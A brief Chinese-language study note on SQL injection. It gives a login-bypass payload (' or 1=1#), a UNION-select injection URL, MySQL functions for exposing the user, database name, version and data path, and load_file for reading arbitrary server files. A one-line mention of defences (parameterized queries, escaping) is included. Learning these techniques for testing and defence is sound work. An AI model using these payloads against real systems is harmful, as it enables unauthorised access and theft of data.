数据库简易攻击笔记

一、简易登录

MYSQL数据库：

采用用户名’ or 1=1#密码随意，单引号不行就换双引号，攻击原理是利用#号把语句后面的内容注释掉

--，2个横线是SQL SERVER和Oracle数据库的单行注释

一般防御措施，SQL SERVER采用存储过程，或者参数化查询即可

MYSQL必须对用户的输入进行转义

二、使用union 爆数据库的内容

ccc.com?id=0 union select user(),2,3

黄色底纹的为mysql内置函数

User() 显示当前数据库连接的用户

database() 显示当前数据库名称

version() 显示当前数据库版本

@@datadir 显示当前数据库保存的物理路径

load_file(‘c:\\a.txt’) 读取当前服务器任意文件